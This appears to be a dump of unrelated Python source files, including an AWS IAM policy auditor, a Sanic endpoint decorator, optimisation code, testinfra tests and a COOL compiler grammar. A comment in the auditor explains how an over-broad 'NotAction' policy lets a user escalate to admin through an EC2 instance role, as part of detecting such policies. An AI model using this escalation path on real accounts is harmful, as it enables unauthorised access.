breakpoints: %s", df[pd.isnull(df.breakpoint)].shape[0]) df.breakpoint[pd.isnull(df.breakpoint)] = df[pd.isnull(df.breakpoint)].sdate.apply(get_breakpoint) logging.info(u"Left NA breakpoints: %s", df[pd.isnull(df.breakpoint)].shape[0]) return df.drop(u'zone_name', axis=1) def main(): check_data(args.input_csv, args.input_csv_delimiter) df = raw_data_to_df(args.input_csv, args.input_csv_delimiter) original_columns = df.columns logging.info(u"DF initial shape: %s", df.shape) df = df.drop(COLS_TO_DROP, axis=1) df = canonize_datetime(df, DATE_COLS) df = fill_missed_breakpoints(df) df = fine_tune_df(df) processed_columns = set(df.columns).union(COLS_TO_DROP + [u'zone_name']) check_processed_columns(processed_columns, original_columns) logging.info(u"Dumping data to: %s", args.output_csv) df.to_csv(args.output_csv, index=False) if __name__ == '__main__': parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawTextHelpFormatter) parser.add_argument('-i', required=True, dest="input_csv", help=u'Path to a csv file with bookings') parser.add_argument('--id', default=";", dest="input_csv_delimiter", help=u"The input file's delimiter. Default: ';'") parser.add_argument('-o', default="bookings.csv", dest="output_csv", help=u'Path to an output file. Default: booking.csv') parser.add_argument("--log-level", default='INFO', dest="log_level", choices=['DEBUG', 'INFO', 'WARNINGS', 'ERROR'], help=u"Logging level") args = parser.parse_args() logging.basicConfig( format='%(asctime)s %(levelname)s:%(message)s', stream=sys.stdout, level=getattr(logging, args.log_level) ) main()
2.390625
2
src/api/wish.py
PKU-GeekGame/gs-backend
7
5551
from sanic import Blueprint, Request, HTTPResponse, response from sanic.models.handler_types import RouteHandler from functools import wraps from inspect import isawaitable from typing import Callable, Dict, Any, Union, Awaitable, List, Optional ACCEPTED_WISH_VERS = ['wish.alpha.v1'] WishHandler = Callable[..., Union[Dict[str, Any], Awaitable[Dict[str, Any]]]] def wish_endpoint(bp: Blueprint, uri: str, *, methods: Optional[List[str]] = None) -> Callable[[WishHandler], RouteHandler]: if methods is None: methods = ['POST'] def decorator(fn: WishHandler) -> RouteHandler: @wraps(fn) async def wrapped(req: Request, *args: Any, **kwargs: Any) -> HTTPResponse: v = req.headers.get('X-Wish-Version', '(none)') if v not in ACCEPTED_WISH_VERS: return response.json({ 'error': 'WISH_VERSION_MISMATCH', 'error_msg': f'前端版本 {v} 不是最新', }) retval_ = fn(req, *args, **kwargs) retval = (await retval_) if isawaitable(retval_) else retval_ return response.json({ 'error': None, # may be overridden by retval **retval, }) return bp.route(uri, methods)(wrapped) # type: ignore return decorator
2.078125
2
scripts/venv/lib/python2.7/site-packages/cogent/maths/function_optimisation.py
sauloal/cnidaria
3
5552
#!/usr/bin/env python """Algorthims for function optimisation great_deluge() is a hillclimbing algorithm based on: Gunter Dueck: New Optimization Heuristics, The Great Deluge Algorithm and the Record-to-Record Travel. Journal of Computational Physics, Vol. 104, 1993, pp. 86 - 92 ga_evolve() is a basic genetic algorithm in which all internal functions can be overridden NOTE: both optimisation functions are generators. """ from numpy.random import normal __author__ = "<NAME> and <NAME>" __copyright__ = "Copyright 2007-2012, The Cogent Project" __credits__ = ["<NAME>", "<NAME>"] __license__ = "GPL" __version__ = "1.5.3" __maintainer__ = "<NAME>" __email__ = "<EMAIL>" __status__ = "Production" def _simple_breed(best, num, mutation_rate, random_f): """Returns num copies of parent with mutation_rate changes""" result = [] score, parent = best for child_number in range(num): if random_f() <= mutation_rate: child = parent.mutate() result.append(child) else: result.append(parent) return result def _simple_score(child, target): """Returns the childs score as defined by the childs scoring function""" return child.score(target) def _simple_init(parent, num): """Creates a list parent copies""" return [parent.copy() for i in range(num)] def _simple_select(population, scores): """Returns a tuple: (best_score, best_child)""" scored = zip(scores, population) scored.sort() return scored[0] def great_deluge(a, step_factor=500, max_iter=100, max_total_iters=1000): """This generator makes random variations of the object a to minimize cost. Yields are performed at the end of each iteration and a tuple containing ((iter_count, total_iters), a) is returned. iter_count is used to kill the while loop in the event that no new objects are found with a better cost. iter_count gets reset each time an object with a better cost is found. total_iters will kill the while loop when the total number of iterations through the loop reaches max_total_iters Object a must implement methods cost() and perturb() for evaluating the score and making mutations respectively. Usually, you'll want to write a wrapper that passes these through to methods of an internal data object, or functions acting on that object. """ water_level = curr_cost = a.cost() # can't be worse than initial guess step_size = abs(water_level)/step_factor iter_count = 0 total_iters = 0 while iter_count < max_iter and total_iters < max_total_iters: new = a.perturb() new_cost = new.cost() if new_cost < water_level: if new_cost < curr_cost: water_level = max(curr_cost, water_level - step_size) iter_count = 0 # WARNING: iter_count is reset here! curr_cost = new_cost a = new else: iter_count += 1 yield ((iter_count, total_iters), a) total_iters += 1 def ga_evolve(parent, target, num, mutation_rate=0.01, score_f=_simple_score, breed_f=_simple_breed, select_f=_simple_select, init_f=_simple_init, random_f=normal, max_generations=1000): """Evolves a population based on the parent to the target Parent must implement methods copy(), mutate(), and score(target) to be used with the simple default functions. Yields are performed at the end of each iteration and contain the tuple (generation, best). The default functions return the tuple (generation, (best_score, best_obj)). Arguments: parent: Object to create initial population from. target: The goal of the evolution. num: Population size. mutation_rate: Rate at which objects in the population are mutated. score_f: Function to score the object against the target. breed_f: Function to create new population with mutations select_f: Function to select best object(s) from the population random_f: Function to be used in breed_f max_generations: Kills while loop if max_generations is reached Overload default functions: score_f: Must take an object and a target score. Returns objects score. breed_f: Must take a tuple containing (scores, objects), the size of population, a mutation rate and random function to use. Returns a list containing the initial population. Default function takes only the best object, but this may not be desired behavior. select_f: Must take a population and scores. Returns a tuple containing the best scores and objects in the population. Default function returns only the best score and object. init_f: Must take an object and the size of the population. Returns a list containing the starting population """ generation = 0 population = init_f(parent, num) while generation < max_generations: scores = [score_f(child, target) for child in population] best = select_f(population, scores) population = breed_f(best, num, mutation_rate, random_f) yield (generation, best) generation += 1
3.140625
3
collect_policies.py
jonathanbglass/parallel_prowler
3
5553
import argparse import boto3 import json import logging import os from progressbar import ProgressBar import sys """ Collects IAM Policies Evaluates policies looking for badness (*.*, Effect:Allow + NotAction) Need to add more tests/use cases """ def get_policies(profile): session = boto3.session.Session(profile_name=profile) myiam = session.client('iam') marker = None allPolicies = [] passcount = 1 while True: pbar = ProgressBar('Collecting Policies') print("Policy Collection, Pass Number: {}".format(passcount)) passcount += 1 if marker: response_iterator = myiam.list_policies(OnlyAttached=True, Marker=marker) else: response_iterator = myiam.list_policies(OnlyAttached=True) for p in pbar(response_iterator['Policies']): polVers = myiam.get_policy_version( PolicyArn=p['Arn'], VersionId=p['DefaultVersionId']) mypol = {'Policy': p, 'PolicyVersion': polVers['PolicyVersion']} allPolicies.append(mypol) pfl = open(os.path.join('policies/', p['PolicyName']+'.json'), 'w') pfl.write(json.dumps(mypol, default=str, indent=4)) pfl.close() ae = myiam.list_entities_for_policy(PolicyArn=p['Arn']) pfl = open(os.path.join('attachedentities/', p['PolicyName']+'.json'), 'w') pfl.write(json.dumps(ae, default=str, indent=4)) pfl.close() try: marker = response_iterator['Marker'] except KeyError: break print("\nTotal Policies: {}".format(len(allPolicies))) pbar = ProgressBar('\tChecking for Dangerous Policies') for p in pbar(allPolicies): # This section looks for bad/dangerous patterns # Pattern 1: Allow *.* # AWSLambdaRole { # 'Version': '2012-10-17', # 'Statement': [ # {'Effect': 'Allow', # 'Action': '*', # 'Resource': ['*'] # } # ] # } try: q = p['PolicyVersion']['Document']['Statement'][0] except Exception as e: print("Problem parsing this policy: {}".format(p)) logging.debug("Problem parsing this policy: {}".format(p)) print(e) continue try: if (q['Effect'] == "Allow" and '*' in q['Resource'] and '*' in q['Action']): print("Review Dangerous Policy: {} -> {}".format( p['Policy']['PolicyName'], p['PolicyVersion']['Document'])) except Exception as e: pass # Pattern 2: Allow: *, NotAction # {'Version': '2012-10-17', # 'Statement': [ # { # 'Effect': 'Allow', # 'NotAction': ['iam:*', 'organizations:*', 'account:*'], # 'Resource': '*' # }, # { # 'Effect': 'Allow', # 'Action': [ 'iam:CreateServiceLinkedRole', # 'iam:DeleteServiceLinkedRole', # 'iam:ListRoles', # 'organizations:DescribeOrganization', # 'account:ListRegions' # ], # 'Resource': '*' # } # ]} # This policy blacklists all 'iam:*', 'organizations:*', and # 'accounts:*' with the NotAction. Then it grants specific # access in the next stanza ('iam:ListRoles', etc) # The fatal flaw is that it grants access to everything else, # like lambda or ec2 because of the "Allow" in the first stanza. # This user can create an EC2 instance, attach an admin role to # it, and login and give themselves access to Admin. Instance # privilege escalation. try: if (q['NotAction'] and q['Effect'] == 'Allow' and q['Resource'] == '*'): print("Review Suspect Policy: {} -> {}".format( p['Policy']['PolicyName'], p['PolicyVersion']['Document'])) except Exception as e: pass return def check_args_creds(args): # handle profiles / authentication / credentials workingCreds = False global logging global workingProfiles workingProfiles = [] if not args.profile: logging.info("Using AWS Default Profile") if (not check_profile("default")): logging.error("Default credentials not working.") print("Default credentials not working.") quit() else: workingProfiles.append("default") workingCreds = True if args.profile and args.profile is not None: logging.info("Using " + args.profile + " Profile") if (not check_profile(args.profile)): logging.error("Profile " + args.profile + " not working") exit(1) else: logging.info("Profile " + args.profile + " working") workingProfiles.append(args.profile) workingCreds = True return args.profile def check_profile(profile): global logging try: if(profile == "default"): client = boto3.session.Session() else: logging.info("Testing profile: " + profile) client = boto3.session.Session(profile_name=profile) except Exception as e: logging.error("Error connecting: ") logging.error(e) return False try: iam = client.client('iam') response = iam.list_users() except Exception as e: logging.error("Error listing users: ") logging.error(e) return False if len(response['Users']) == 0: logging.info("No users") if len(response) > 0: usercnt = len(response['Users']) if(usercnt > 1): userresp = " Users" else: userresp = " User" logging.info(str(usercnt) + userresp) return True def setup_args(parser): parser.add_argument("-p", "--profile", help="AWS Profile") parser.add_argument("-l", "--log", help="Log Level") def main(): global logging parser = argparse.ArgumentParser() setup_args(parser) global args args = parser.parse_args() if args.log and args.log.upper() == "DEBUG": loglevel = "DEBUG" else: loglevel = "INFO" logging.basicConfig(filename='policyAssessment.log', format='%(levelname)s:%(message)s', level=loglevel) profile = check_args_creds(args) get_policies(profile) if __name__ == "__main__": # execute only if run as a script main()
2.296875
2
test/molecule-role/molecule/integrations/tests/test_nagios.py
StackVista/stackstate-agent
2
5554
import json import os import re from testinfra.utils.ansible_runner import AnsibleRunner import util testinfra_hosts = AnsibleRunner(os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('agent-integrations') def _get_key_value(tag_list): for key, value in (pair.split(':', 1) for pair in tag_list): yield key, value def _component_data(json_data, type_name, external_id_assert_fn, tags_assert_fn): for message in json_data["messages"]: p = message["message"]["TopologyElement"]["payload"] if "TopologyComponent" in p and \ p["TopologyComponent"]["typeName"] == type_name and \ external_id_assert_fn(p["TopologyComponent"]["externalId"]): data = json.loads(p["TopologyComponent"]["data"]) if tags_assert_fn(dict(_get_key_value(data["tags"]))): return data return None def test_nagios_mysql(host): def assert_topology(): topo_url = "http://localhost:7070/api/topic/sts_topo_process_agents?limit=1500" data = host.check_output('curl "{}"'.format(topo_url)) json_data = json.loads(data) with open("./topic-nagios-topo-process-agents.json", 'w') as f: json.dump(json_data, f, indent=4) external_id_pattern = re.compile(r"urn:container:/agent-integrations:.*") components = [ { "assertion": "Should find the nagios container", "type": "container", "external_id": lambda e_id: external_id_pattern.findall(e_id), "tags": lambda t: t["container_name"] == "ubuntu_nagios_1" }, { "assertion": "Should find the mysql container", "type": "container", "external_id": lambda e_id: external_id_pattern.findall(e_id), "tags": lambda t: t["container_name"] == "ubuntu_mysql_1" } ] for c in components: print("Running assertion for: " + c["assertion"]) assert _component_data( json_data=json_data, type_name=c["type"], external_id_assert_fn=c["external_id"], tags_assert_fn=c["tags"], ) is not None util.wait_until(assert_topology, 30, 3) def test_container_metrics(host): url = "http://localhost:7070/api/topic/sts_multi_metrics?limit=1000" def wait_for_metrics(): data = host.check_output("curl \"%s\"" % url) json_data = json.loads(data) with open("./topic-nagios-sts-multi-metrics.json", 'w') as f: json.dump(json_data, f, indent=4) def get_keys(m_host): return set( ''.join(message["message"]["MultiMetric"]["values"].keys()) for message in json_data["messages"] if message["message"]["MultiMetric"]["name"] == "convertedMetric" and message["message"]["MultiMetric"]["host"] == m_host ) expected = {'nagios.http.size', 'nagios.ping.pl', 'nagios.http.time', 'nagios.current_load.load15', 'nagios.swap_usage.swap', 'nagios.host.pl', 'nagios.root_partition', 'nagios.current_users.users', 'nagios.current_load.load1', 'nagios.host.rta', 'nagios.ping.rta', 'nagios.current_load.load5', 'nagios.total_processes.procs'} assert all([expectedMetric for expectedMetric in expected if expectedMetric in get_keys("agent-integrations")]) util.wait_until(wait_for_metrics, 180, 3)
2.25
2
erudition/util.py
papsebestyen/erudition
0
5555
import os import sys from contextlib import contextmanager from invoke import UnexpectedExit def git_commit(c, addstr, msg): try: c.run("git config --get user.email") c.run("git config --get user.name") except UnexpectedExit: c.run('git config --local user.email "<EMAIL>"') c.run('git config --local user.name "CI/CD"') c.run(f'git add {addstr} && git commit -m "{msg}"') @contextmanager def cd_into(dirpath): wd = os.getcwd() os.chdir(dirpath) sys.path.insert(0, str(dirpath)) yield os.chdir(wd) sys.path.pop(0)
2.28125
2
python3/distortion_correct_aksk_demo.py
MeekoI/ais-sdk
0
5556
<filename>python3/distortion_correct_aksk_demo.py # -*- coding:utf-8 -*- from ais_sdk.utils import encode_to_base64 from ais_sdk.utils import decode_to_wave_file from ais_sdk.distortion_correct import distortion_correct_aksk from ais_sdk.utils import init_global_env import json if __name__ == '__main__': # # access moderation distortion correct.post data by ak,sk # app_key = '*************' app_secret = '************' init_global_env(region='cn-north-1') demo_data_url = 'https://ais-sample-data.obs.cn-north-1.myhuaweicloud.com/vat-invoice.jpg' #call interface use the url correction is true means do not correction result = distortion_correct_aksk(app_key, app_secret, "", demo_data_url, True) result_obj = json.loads(result) if result_obj['result']['data'] != '': decode_to_wave_file(result_obj['result']['data'], 'data/moderation-distortion-aksk-1.png') else: print(result) # call interface use the file result = distortion_correct_aksk(app_key, app_secret, encode_to_base64('data/moderation-distortion.jpg'), '', True) result_obj = json.loads(result) if result_obj['result']['data'] != '': decode_to_wave_file(result_obj['result']['data'], 'data/moderation-distortion-aksk-2.png') else: print(result)
2.5
2
exercise/migrations/0016_auto_20191025_1624.py
Arpit8081/Phishtray_Edited_Version
2
5557
<filename>exercise/migrations/0016_auto_20191025_1624.py # Generated by Django 2.2.6 on 2019-10-25 16:24 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('exercise', '0015_exerciseemailproperties_date_received'), ] operations = [ migrations.AlterField( model_name='exercise', name='copied_from', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='exercise.Exercise'), ), ]
1.3125
1
release/stubs.min/Autodesk/Revit/DB/__init___parts/GeomCombinationSet.py
YKato521/ironpython-stubs
0
5558
class GeomCombinationSet(APIObject, IDisposable, IEnumerable): """ A set that contains GeomCombination objects. GeomCombinationSet() """ def Clear(self): """ Clear(self: GeomCombinationSet) Removes every item GeomCombination the set,rendering it empty. """ pass def Contains(self, item): """ Contains(self: GeomCombinationSet,item: GeomCombination) -> bool Tests for the existence of an GeomCombination within the set. item: The element to be searched for. Returns: The Contains method returns True if the GeomCombination is within the set, otherwise False. """ pass def Dispose(self): """ Dispose(self: GeomCombinationSet,A_0: bool) """ pass def Erase(self, item): """ Erase(self: GeomCombinationSet,item: GeomCombination) -> int Removes a specified GeomCombination from the set. item: The GeomCombination to be erased. Returns: The number of GeomCombinations that were erased from the set. """ pass def ForwardIterator(self): """ ForwardIterator(self: GeomCombinationSet) -> GeomCombinationSetIterator Retrieve a forward moving iterator to the set. Returns: Returns a forward moving iterator to the set. """ pass def GetEnumerator(self): """ GetEnumerator(self: GeomCombinationSet) -> IEnumerator Retrieve a forward moving iterator to the set. Returns: Returns a forward moving iterator to the set. """ pass def Insert(self, item): """ Insert(self: GeomCombinationSet,item: GeomCombination) -> bool Insert the specified element into the set. item: The GeomCombination to be inserted into the set. Returns: Returns whether the GeomCombination was inserted into the set. """ pass def ReleaseManagedResources(self, *args): """ ReleaseManagedResources(self: APIObject) """ pass def ReleaseUnmanagedResources(self, *args): """ ReleaseUnmanagedResources(self: GeomCombinationSet) """ pass def ReverseIterator(self): """ ReverseIterator(self: GeomCombinationSet) -> GeomCombinationSetIterator Retrieve a backward moving iterator to the set. Returns: Returns a backward moving iterator to the set. """ pass def __enter__(self, *args): """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): """ __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """ pass def __init__(self, *args): """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __iter__(self, *args): """ __iter__(self: IEnumerable) -> object """ pass IsEmpty = property(lambda self: object(), lambda self, v: None, lambda self: None) """Test to see if the set is empty. Get: IsEmpty(self: GeomCombinationSet) -> bool """ Size = property(lambda self: object(), lambda self, v: None, lambda self: None) """Returns the number of GeomCombinations that are in the set. Get: Size(self: GeomCombinationSet) -> int """
2.75
3
rainbow/datasources/cfn_datasource.py
omribahumi/rainbow
35
5559
<reponame>omribahumi/rainbow<filename>rainbow/datasources/cfn_datasource.py from rainbow.cloudformation import Cloudformation from base import DataSourceBase __all__ = ['CfnOutputsDataSource', 'CfnResourcesDataSource', 'CfnParametersDataSource'] class CfnDataSourceBase(DataSourceBase): def __init__(self, data_source): super(CfnDataSourceBase, self).__init__(data_source) stack_name = data_source region = Cloudformation.default_region if ':' in data_source: region, stack_name = data_source.split(':', 1) cfn_connection = Cloudformation(region) if not cfn_connection: raise Exception('Invalid region %r' % (region,)) self.stack = cfn_connection.describe_stack(stack_name) class CfnOutputsDataSource(CfnDataSourceBase): datasource_name = 'cfn_outputs' def __init__(self, data_source): super(CfnOutputsDataSource, self).__init__(data_source) self.data = {i.key: i.value for i in self.stack.outputs} class CfnResourcesDataSource(CfnDataSourceBase): datasource_name = 'cfn_resources' def __init__(self, data_source): super(CfnResourcesDataSource, self).__init__(data_source) self.data = {r.logical_resource_id: r.physical_resource_id for r in self.stack.describe_resources()} class CfnParametersDataSource(CfnDataSourceBase): datasource_name = 'cfn_parameters' def __init__(self, data_source): super(CfnParametersDataSource, self).__init__(data_source) self.data = {p.key: p.value for p in self.stack.parameters}
2.234375
2
epio_commands/management/commands/epio_flush_redis.py
idan/pypostbin
2
5560
import redis from bundle_config import config from django.core.management.base import NoArgsCommand class Command(NoArgsCommand): help = 'Flushes all keys in redis.' def handle_noargs(self, **options): r = redis.Redis(host=config['redis']['host'], port=int(config['redis']['port']), password=config['redis']['password']) r.flushall() print "All redis keys flushed."
2.171875
2
python/flexflow_cffi_build.py
zmxdream/FlexFlow
455
5561
<filename>python/flexflow_cffi_build.py #!/usr/bin/env python # Copyright 2020 Stanford University, Los Alamos National Laboratory # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from __future__ import absolute_import, division, print_function, unicode_literals import argparse import os import subprocess def find_flexflow_header(ffhome_dir): def try_prefix(prefix_dir): flexflow_ch_path = os.path.join(prefix_dir, 'python', 'flexflow_c.h') flexflow_cxxh_path = os.path.join(prefix_dir, 'include', 'model.h') if os.path.exists(flexflow_ch_path) and os.path.exists(flexflow_cxxh_path): flexflow_cxxh_dir = os.path.join(prefix_dir, 'include') return flexflow_cxxh_dir, flexflow_ch_path result = try_prefix(ffhome_dir) if result: return result raise Exception('Unable to locate flexflow_c.h and flexflow.h header file') def build(output_dir, libname, ffhome_dir): flexflow_cxxh_dir, flexflow_ch_path = find_flexflow_header(ffhome_dir) header = subprocess.check_output(['gcc', '-I', flexflow_cxxh_dir, '-E', '-P', flexflow_ch_path]).decode('utf-8') with open(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'flexflow_cffi_header.py.in')) as f: content = f.read() content = content.format(header=repr(header), libname=repr(libname)) if output_dir is None: output_dir = os.path.dirname(os.path.realpath(__file__)) with open(os.path.join(output_dir, 'flexflow_cffi_header.py'), 'wb') as f: f.write(content.encode('utf-8')) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('--ffhome-dir', required=True) parser.add_argument('--libname', required=True) parser.add_argument('--output-dir', required=False) args = parser.parse_args() build(args.output_dir, args.libname, args.ffhome_dir)
2.1875
2
gaphor/plugins/xmiexport/__init__.py
tuxcell/gaphor
0
5562
<filename>gaphor/plugins/xmiexport/__init__.py """This plugin extends Gaphor with XMI export functionality.""" import logging from gaphor.abc import ActionProvider, Service from gaphor.core import action, gettext from gaphor.plugins.xmiexport import exportmodel from gaphor.ui.filedialog import FileDialog logger = logging.getLogger(__name__) class XMIExport(Service, ActionProvider): def __init__(self, element_factory, file_manager, export_menu): self.element_factory = element_factory self.file_manager = file_manager export_menu.add_actions(self) def shutdown(self): pass @action( name="file-export-xmi", label=gettext("Export to XMI"), tooltip=gettext("Export model to XMI (XML Model Interchange) format"), ) def execute(self): filename = self.file_manager.filename filename = filename.replace(".gaphor", ".xmi") if filename else "model.xmi" file_dialog = FileDialog( gettext("Export model to XMI file"), action="save", filename=filename ) filename = file_dialog.selection if filename and len(filename) > 0: logger.debug(f"Exporting XMI model to: {filename}") export = exportmodel.XMIExport(self.element_factory) try: export.export(filename) except Exception as e: logger.error(f"Error while saving model to file {filename}: {e}")
2.21875
2
tests/utils.py
btk15049/online-judge-tools
0
5563
<gh_stars>0 import contextlib import os import pathlib import subprocess import sys import tempfile @contextlib.contextmanager def chdir(path): cwd = os.getcwd() try: os.chdir(path) yield finally: os.chdir(cwd) def prepare_files(files): for f in files: path = pathlib.Path(f['path']) path.parent.mkdir(parents=True, exist_ok=True) with open(str(path), 'w') as fh: fh.write(f['data']) if f.get('executable', False): path.chmod(0o755) @contextlib.contextmanager def sandbox(files): with tempfile.TemporaryDirectory() as tempdir: with chdir(tempdir): prepare_files(files) yield tempdir def get_oj_exe(): oj_exe = os.environ.get('TEST_OJ_EXE') if oj_exe is not None: return [str(pathlib.Path(oj_exe).resolve())] else: return [sys.executable, '-m', 'onlinejudge._implementation.main'] def run(args, *, env=None, check=False, oj_exe=get_oj_exe()): # oj_exe should be evaluated out of sandboxes env = env or dict(os.environ) env['PYTHONPATH'] = str(pathlib.Path(__file__).parent.parent) # this is required to run in sandboxes return subprocess.run(oj_exe + args, stdout=subprocess.PIPE, stderr=sys.stderr, env=env, check=check) def run_in_sandbox(args, files): with sandbox(files) as tempdir: proc = run(args) return { 'proc': proc, 'tempdir': tempdir, } def cat(): if os.name == 'nt': return '{} -c "import sys; sys.stdout.buffer.write(sys.stdin.buffer.read())"'.format(sys.executable) else: return 'cat' def sleep_1sec(): if os.name == 'nt': return '{} -c "import time; time.sleep(1)"'.format(sys.executable) else: return 'sleep 1.0' def python_c(cmd): assert '"' not in cmd return '{} -c "{}"'.format(sys.executable, cmd) def python_script(path): assert '"' not in path return '{} "{}"'.format(sys.executable, path) def is_logged_in(service, memo={}): # functools.lru_cache is unusable since Service are unhashable url = service.get_url() if url not in memo: proc = run(['login', '--check', url]) memo[url] = proc.returncode == 0 return memo[url]
2.375
2
git_operation.py
zerzerzerz/Computer-Virus
0
5564
<gh_stars>0 import os commit_string = "选择data的前多少个维度参与训练" not_add = ['results', 'data', 'weights'] for item in os.listdir(): if item in not_add: # print(item) continue else: os.system(f"git add {item}") os.system(f'git commit -m "{commit_string}"') os.system("git push origin main")
2.546875
3
src/cool_grammar.py
peanut-butter-jellyyy/cool-compiler-2021
0
5565
<gh_stars>0 from src.cmp.pycompiler import Grammar from src.ast_nodes import ( ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode, ) def define_cool_grammar(print_grammar=False): # grammar G = Grammar() # non-terminals program = G.NonTerminal("<program>", startSymbol=True) class_list, def_class = G.NonTerminals("<class-list> <def-class>") feature_list, def_attr, def_func = G.NonTerminals( "<feature-list> <def-attr> <def-func>" ) param_list, param = G.NonTerminals("<param-list> <param>") expr, comp, arith, term, factor, element, atom = G.NonTerminals( "<expr> <comp> <arith> <term> <factor> <element> <atom>" ) identifiers_list, identifier_init = G.NonTerminals("<ident-list> <ident-init>") block, case_block, case_item = G.NonTerminals("<block> <case-block> <case-item>") func_call, arg_list = G.NonTerminals("<func-call> <arg-list>") # terminals classx, inherits, notx, isvoid = G.Terminals("class inherits not isvoid") let, inx = G.Terminals("let in") ifx, then, elsex, fi = G.Terminals("if then else fi") whilex, loop, pool = G.Terminals("while loop pool") case, of, esac = G.Terminals("case of esac") semi, colon, comma, dot, opar, cpar, ocur, ccur, at, larrow, rarrow = G.Terminals( "; : , . ( ) { } @ <- =>" ) equal, plus, minus, star, div, less, equal, lesseq, neg = G.Terminals( "= + - * / < = <= ~" ) idx, num, new, string, true, false = G.Terminals("id int new string true false") # productions program %= class_list, lambda h, s: ProgramNode(s[1]) class_list %= def_class + class_list, lambda h, s: [s[1]] + s[2] class_list %= def_class, lambda h, s: [s[1]] def_class %= ( classx + idx + ocur + feature_list + ccur + semi, lambda h, s: ClassDeclarationNode(s[2], s[4]), ) def_class %= ( classx + idx + inherits + idx + ocur + feature_list + ccur + semi, lambda h, s: ClassDeclarationNode(s[2], s[6], s[4]), ) feature_list %= def_attr + semi + feature_list, lambda h, s: [s[1]] + s[3] feature_list %= def_func + semi + feature_list, lambda h, s: [s[1]] + s[3] feature_list %= G.Epsilon, lambda h, s: [] def_attr %= ( idx + colon + idx + larrow + expr, lambda h, s: AttrDeclarationNode(s[1], s[3], s[5]), ) def_attr %= idx + colon + idx, lambda h, s: AttrDeclarationNode(s[1], s[3]) def_func %= ( idx + opar + param_list + cpar + colon + idx + ocur + expr + ccur, lambda h, s: FuncDeclarationNode(s[1], s[3], s[6], s[8]), ) param_list %= param + comma + param_list, lambda h, s: [s[1]] + s[3] param_list %= param, lambda h, s: [s[1]] param_list %= G.Epsilon, lambda h, s: [] param %= idx + colon + idx, lambda h, s: (s[1], s[3]) expr %= idx + larrow + expr, lambda h, s: AssignNode(s[1], s[3]) expr %= let + identifiers_list + inx + expr, lambda h, s: LetNode(s[2], s[4]) expr %= ( ifx + expr + then + expr + elsex + expr + fi, lambda h, s: IfNode(s[2], s[4], s[6]), ) expr %= whilex + expr + loop + expr + pool, lambda h, s: WhileNode(s[2], s[4]) expr %= case + expr + of + case_block + esac, lambda h, s: CaseNode(s[2], s[4]) expr %= notx + expr, lambda h, s: NotNode(s[2]) expr %= comp, lambda h, s: s[1] identifiers_list %= ( identifier_init + comma + identifiers_list, lambda h, s: [s[1]] + s[3], ) identifiers_list %= identifier_init, lambda h, s: [s[1]] identifier_init %= ( idx + colon + idx + larrow + expr, lambda h, s: VarDeclarationNode(s[1], s[3], s[5]), ) identifier_init %= idx + colon + idx, lambda h, s: VarDeclarationNode(s[1], s[3]) case_block %= case_item + case_block, lambda h, s: [s[1]] + s[2] case_block %= case_item, lambda h, s: [s[1]] case_item %= ( idx + colon + idx + rarrow + expr + semi, lambda h, s: CaseItemNode(s[1], s[3], s[5]), ) comp %= comp + less + arith, lambda h, s: LessNode(s[1], s[3]) comp %= comp + equal + arith, lambda h, s: EqualNode(s[1], s[3]) comp %= comp + lesseq + arith, lambda h, s: LessEqualNode(s[1], s[3]) comp %= arith, lambda h, s: s[1] arith %= arith + plus + term, lambda h, s: PlusNode(s[1], s[3]) arith %= arith + minus + term, lambda h, s: MinusNode(s[1], s[3]) arith %= term, lambda h, s: s[1] term %= term + star + factor, lambda h, s: StarNode(s[1], s[3]) term %= term + div + factor, lambda h, s: DivNode(s[1], s[3]) term %= factor, lambda h, s: s[1] factor %= isvoid + element, lambda h, s: IsvoidNode(s[2]) factor %= neg + element, lambda h, s: NegNode(s[2]) factor %= new + idx, lambda h, s: InstantiateNode(s[2]) factor %= element, lambda h, s: s[1] element %= opar + expr + cpar, lambda h, s: s[2] element %= ocur + block + ccur, lambda h, s: BlockNode(s[2]) element %= (element + dot + func_call, lambda h, s: CallNode(*s[3], obj=s[1])) element %= ( element + at + idx + dot + func_call, lambda h, s: CallNode(*s[5], obj=s[1], at_type=s[3]), ) element %= func_call, lambda h, s: CallNode(*s[1]) element %= atom, lambda h, s: s[1] atom %= num, lambda h, s: ConstantNumNode(s[1]) atom %= idx, lambda h, s: VariableNode(s[1]) atom %= ( true, lambda h, s: BooleanNode(s[1]), ) atom %= false, lambda h, s: BooleanNode(s[1]) atom %= string, lambda h, s: StringNode(s[1]) block %= expr + semi, lambda h, s: [s[1]] block %= expr + semi + block, lambda h, s: [s[1]] + s[3] func_call %= idx + opar + arg_list + cpar, lambda h, s: (s[1], s[3]) arg_list %= expr + comma + arg_list, lambda h, s: [s[1]] + s[3] arg_list %= expr, lambda h, s: [s[1]] arg_list %= G.Epsilon, lambda h, s: [] if print_grammar: print(G) return (G, idx, string, num)
2.5
2
userbot/plugins/selfdestruct.py
Aliensuniquebot/CatUserbot
1
5566
